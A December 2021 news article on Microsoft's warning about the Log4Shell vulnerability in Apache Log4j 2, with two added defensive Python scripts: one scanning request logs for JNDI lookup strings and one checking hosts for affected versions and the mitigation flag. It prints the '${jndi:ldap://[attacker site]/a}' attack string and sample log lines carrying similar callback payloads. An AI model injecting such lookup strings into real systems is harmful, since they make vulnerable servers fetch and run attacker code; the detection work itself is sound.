Microsoft warns of greater exploit than SolarWinds with Log4j2 bug – onmsft.com

Kareem Anderson Kareem Anderson
December 15, 2021
4 min read

Microsoft is once again sounding the alarm on state-sponsored cyberattacks, this time ones that make use of a flaw in a Java logging library, tracked as CVE-2021-44228 and known as the Log4j2 (“log forge”) bug.

Microsoft believes state-sanctioned hacking groups from countries such as Iran, North Korea, Turkey and China have begun using more sophisticated techniques to exploit the widely used Java-based Log4j2 logging library and gain remote access to compromised devices.

Microsoft’s unified threat intelligence team, comprising the Microsoft Threat Intelligence Center (MSTIC), Microsoft 365 Defender Threat Intelligence Team, RiskIQ, and the Microsoft Detection and Response Team (DART), among others, has been tracking threats taking advantage of CVE-2021-44228, a remote code execution (RCE) vulnerability in Apache Log4j 2 referred to as “Log4Shell”.

The bulk of attacks Microsoft has observed at this time have been related to mass scanning by attackers attempting to fingerprint vulnerable systems, as well as scanning by security companies and researchers. An example attack pattern would appear in a web request log with strings like the following:

${jndi:ldap://[attacker site]/a}

Lending credence to Microsoft’s claims is the US Cybersecurity and Infrastructure Security Agency (CISA), which has also documented widespread use of the Log4Shell exploit.

Speaking with CNN yesterday, Jen Easterly, director of CISA, reiterated the dire situation that devices, services and the internet as a whole will be in if countermeasures aren’t implemented swiftly.

This vulnerability is one of the most serious that I’ve seen in my entire career, if not the most serious.

We expect the vulnerability to be widely exploited by sophisticated actors and we have limited time to take necessary steps in order to reduce the likelihood of damage.

In Microsoft’s warning, the company points to a two-pronged problem with Log4j2: the bug is easy to exploit, and a great many products have been built on the library. Apache Log4j2 is among the most popular Java logging libraries in current use.

Specifically, logging libraries give developers added information about services and products by letting them control how much data is gathered while an application runs, or when users report bugs or functionality issues with a specific service or device.

Using log libraries, developers can gain insight into or gather information about devices, including CPU type, GPU model, driver versions, system memory, and more.

An attacker performs an HTTP request against a target system, which generates a log entry using Log4j 2; the library’s JNDI lookup then performs a request to the attacker-controlled site. The vulnerability causes the exploited process to reach out to that site and execute the payload. In many observed attacks, the attacker-owned parameter is a DNS logging system, intended only to log a request to the site in order to fingerprint vulnerable systems.
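The lookup string shown above, and the request flow just described, are what a defender would hunt for in web request logs. The following Python script is an added example written for this article, not code from Microsoft or the Log4j project. It scans constructed Apache-style request log lines for the literal ${jndi:...} lookup syntax, extracts the callback host for blocking and triage, and separates DNS-only fingerprinting callbacks (the common case the article describes) from LDAP/RMI callbacks that can deliver a payload. The sample log lines, IP addresses and hostnames are all made up; the scheme list is an assumption covering the standard JNDI URL schemes, and the script does not attempt to catch obfuscated variants of the string.

```python
import re
from urllib.parse import urlsplit

# Constructed sample request log lines (Apache combined-log style). None of
# these come from a real system; the .invalid domains are reserved examples.
SAMPLE_LOG_LINES = [
    '203.0.113.5 - - [13/Dec/2021:10:01:02 +0000] "GET /index.html HTTP/1.1" 200 512 "-" "Mozilla/5.0"',
    '203.0.113.7 - - [13/Dec/2021:10:01:09 +0000] "GET / HTTP/1.1" 200 512 "-" "${jndi:ldap://callback.example.invalid/a}"',
    '203.0.113.9 - - [13/Dec/2021:10:02:41 +0000] "GET /?x=${jndi:dns://scan.example.invalid/probe} HTTP/1.1" 404 0 "-" "curl/7.79"',
    '198.51.100.4 - - [13/Dec/2021:10:03:00 +0000] "POST /login HTTP/1.1" 302 0 "-" "Mozilla/5.0"',
]

# Literal lookup syntax from the article: ${jndi:<scheme>://<target>}.
# LDAP and DNS are the schemes the article mentions; LDAPS and RMI are added
# here as the other standard JNDI URL schemes (assumption for this example).
JNDI_LOOKUP = re.compile(
    r"\$\{jndi:(?P<scheme>ldaps?|rmi|dns)://(?P<target>[^}\s]*)\}", re.IGNORECASE
)


def find_jndi_lookups(line):
    """Return one record per ${jndi:...} lookup string found in a log line."""
    hits = []
    for m in JNDI_LOOKUP.finditer(line):
        scheme = m.group("scheme").lower()
        # urlsplit gives us the host part regardless of scheme name.
        host = urlsplit(f"{scheme}://{m.group('target')}").hostname or ""
        hits.append({
            "raw": m.group(0),
            "scheme": scheme,
            "host": host,
            # The article notes many callbacks are DNS loggers used only to
            # fingerprint a vulnerable host; LDAP/RMI callbacks can serve code.
            "kind": "fingerprint-callback" if scheme == "dns" else "remote-class-callback",
        })
    return hits


def scan_log(lines):
    """Scan request log lines and return one finding per lookup string."""
    findings = []
    for lineno, line in enumerate(lines, start=1):
        client_ip = line.split(" ", 1)[0]  # first field of combined-log format
        for hit in find_jndi_lookups(line):
            findings.append({"line": lineno, "client": client_ip, **hit})
    return findings


def callback_hosts(findings):
    """Unique callback hosts, sorted, for egress blocking or DNS hunting."""
    return sorted({f["host"] for f in findings if f["host"]})


if __name__ == "__main__":
    results = scan_log(SAMPLE_LOG_LINES)
    for f in results:
        print(f"line {f['line']}: client {f['client']} -> {f['kind']} via {f['scheme']} to {f['host']}")
    print("callback hosts:", callback_hosts(results))
```

Run against a real access log by replacing SAMPLE_LOG_LINES with the file's lines; the callback host list is the part worth feeding into egress filtering and DNS query hunting, while the client IPs show which sources were scanning.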

One known use of the exploit in the wild involves Microsoft’s own Minecraft, whose servers served as conduits: hackers could control users’ systems via the Log4j bug simply by posting short messages in the chat box.

In the case of Minecraft, attackers were able to get remote code execution on Minecraft Servers by simply pasting a short message into the chat box.

— Marcus Hutchins (@MalwareTechBlog) December 10, 2021

To date there have been over 400,000 downloads from its GitHub project, according to cybersecurity firm Check Point. To make matters worse, it’s used by many popular companies worldwide, including not only Microsoft but Twitter, Apple, Amazon, Baidu, Cloudflare and NetEase, to list a few.

As of now, Apache has released a fix that should cover all affected versions of the logging package, which include 2.0-beta-9 to 2.14.1. Unfortunately, each company implements Log4j differently, and the speed at which they apply the fix can still leave millions of customers’ data exposed.

If you can’t upgrade log4j, you can mitigate the RCE vulnerability by setting log4j2.formatMsgNoLookups to True (-Dlog4j2.formatMsgNoLookups=true in JVM command line).

— Marcus Hutchins (@MalwareTechBlog) December 10, 2021
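Between the affected version range given above and the stopgap JVM flag in the tweet, an administrator has two things to check on each host. The Python script below is an added example for this article, not code from Apache, Microsoft or Marcus Hutchins. It parses the Log4j 2 version out of a log4j-core jar filename, decides whether it falls in the 2.0-beta9 to 2.14.1 range, and checks the process command line for -Dlog4j2.formatMsgNoLookups=true, reporting each host as vulnerable, mitigated, not affected or unknown. The inventory entries, hostnames and paths are constructed; the ordering of pre-release tags (beta before rc before final) is an assumption matching how the 2.0 pre-releases were numbered, and a jar-name check only covers the unbundled case, so applications that shade or repackage log4j-core need a deeper inspection.

```python
import re

# Affected range as stated in the article.
FIRST_AFFECTED = "2.0-beta9"
LAST_AFFECTED = "2.14.1"

# Pre-release tags sort before a final release: beta < rc < final (assumption).
PRERELEASE_RANK = {"beta": 0, "rc": 1}
FINAL_RANK = 2

VERSION_RE = re.compile(r"(\d+)\.(\d+)(?:\.(\d+))?(?:-(beta|rc)-?(\d+))?")
JAR_NAME_RE = re.compile(r"log4j-core-(?P<version>[0-9][^/\\]*?)\.jar$", re.IGNORECASE)
NOLOOKUPS_FLAG_RE = re.compile(r"-Dlog4j2\.formatMsgNoLookups=true\b", re.IGNORECASE)

# Constructed inventory of hosts: jar path found on disk plus the JVM command line.
SAMPLE_INVENTORY = [
    {"host": "app-01", "jar": "/opt/app/lib/log4j-core-2.14.1.jar", "cmdline": "java -jar app.jar"},
    {"host": "app-02", "jar": "/opt/app/lib/log4j-core-2.14.1.jar", "cmdline": "java -Dlog4j2.formatMsgNoLookups=true -jar app.jar"},
    {"host": "app-03", "jar": "/opt/app/lib/log4j-core-2.15.0.jar", "cmdline": "java -jar app.jar"},
    {"host": "legacy-01", "jar": "/opt/legacy/lib/log4j-core-2.0-beta9.jar", "cmdline": "java -jar legacy.jar"},
    {"host": "old-01", "jar": "/opt/old/lib/log4j-1.2.17.jar", "cmdline": "java -jar old.jar"},
]


def parse_version(version):
    """Turn '2.14.1', '2.0-beta9' or '2.0-beta-9' into a comparable tuple."""
    m = VERSION_RE.fullmatch(version.strip().lower())
    if not m:
        raise ValueError(f"unrecognised log4j version: {version!r}")
    major, minor, patch, tag, tagnum = m.groups()
    rank = PRERELEASE_RANK[tag] if tag else FINAL_RANK
    return (int(major), int(minor), int(patch or 0), rank, int(tagnum or 0))


def is_affected(version):
    """True if the version lies inside the range the article lists."""
    return parse_version(FIRST_AFFECTED) <= parse_version(version) <= parse_version(LAST_AFFECTED)


def version_from_jar_path(path):
    """Extract the version from a log4j-core-<version>.jar path, or None."""
    m = JAR_NAME_RE.search(path)
    return m.group("version") if m else None


def has_nolookups_flag(cmdline):
    """True if the JVM command line sets the mitigation flag from the tweet."""
    return NOLOOKUPS_FLAG_RE.search(cmdline) is not None


def assess(entry):
    """Classify one inventory entry by jar version and mitigation flag."""
    version = version_from_jar_path(entry["jar"])
    if version is None:
        status = "unknown"        # not a log4j-core 2.x jar; needs manual review
    elif not is_affected(version):
        status = "not-affected"
    elif has_nolookups_flag(entry["cmdline"]):
        status = "mitigated"      # stopgap only; the jar still needs upgrading
    else:
        status = "vulnerable"
    return {"host": entry["host"], "version": version, "status": status}


if __name__ == "__main__":
    for entry in SAMPLE_INVENTORY:
        r = assess(entry)
        print(f"{r['host']:<10} {str(r['version']):<12} {r['status']}")
```

The "mitigated" state is deliberately distinct from "not-affected": the flag in the tweet is offered for the case where an upgrade is not yet possible, so hosts in that state should stay on the patch list rather than drop off it.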

While companies scramble to apply patches, hackers are doubling their efforts to exploit Log4j, and at exponential rates. According to a recent report by Check Point, there have been over 800,000 attacks with multiple variants leveraging the Log4j2 bug in the past six days.

To make matters worse, there appears to be a second vulnerability, CVE-2021-45046, which was recently discovered and which hackers are leveraging as an additional exploit while the more publicized Log4j2 bug is being addressed.

For its part, Microsoft is offering several solutions, which can be found in its Microsoft Security blog post on Log4j2, for both Windows and Linux platforms through Microsoft 365 Defender as well as Defender for Endpoint.
